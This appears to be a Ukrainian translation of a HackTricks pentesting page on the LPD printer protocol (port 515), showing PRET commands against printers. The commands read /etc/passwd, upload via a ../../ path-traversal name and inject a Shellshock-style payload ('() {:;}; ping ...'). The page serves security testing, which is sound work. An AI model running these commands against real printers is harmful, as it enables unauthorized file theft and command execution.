5.5 KiB
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!
Інші способи підтримки HackTricks:
- Якщо ви хочете побачити вашу компанію рекламовану на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
- Отримайте офіційний PEASS & HackTricks мерч
- Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
- Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks і HackTricks Cloud репозиторіїв на GitHub.
Вступ до протоколу LPD
У 1980-х роках був розроблений протокол Line Printer Daemon (LPD) в Berkeley Unix, який пізніше був узаконений через RFC1179. Цей протокол працює через порт 515/tcp, дозволяючи взаємодію через команду lpr
. Суть друку через LPD полягає в надсиланні контрольного файлу (для вказання деталей завдання та користувача) разом з файлом даних (який містить інформацію для друку). Хоча контрольний файл дозволяє вибір різних форматів файлів для файлу даних, обробка цих файлів визначається конкретною реалізацією LPD. Широко визнаною реалізацією для систем, схожих на Unix, є LPRng. Зокрема, протокол LPD може бути використаний для виконання зловмисних друкувальних завдань PostScript або PJL.
Інструменти для взаємодії з принтерами LPD
PRET представляє два основні інструменти, lpdprint
та lpdtest
, які пропонують простий спосіб взаємодії з принтерами, сумісними з LPD. Ці інструменти дозволяють виконувати різноманітні дії від друку даних до маніпулювання файлами на принтері, такі як завантаження, вивантаження або видалення.
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
Для осіб, які зацікавлені у подальшому дослідженні сфери взлому принтерів, вичерпний ресурс можна знайти тут: Hacking Printers.
Shodan
порт 515
Вивчайте взлом AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!
Інші способи підтримки HackTricks:
- Якщо ви хочете побачити свою компанію рекламовану на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
- Отримайте офіційний PEASS & HackTricks мерч
- Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
- Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв GitHub.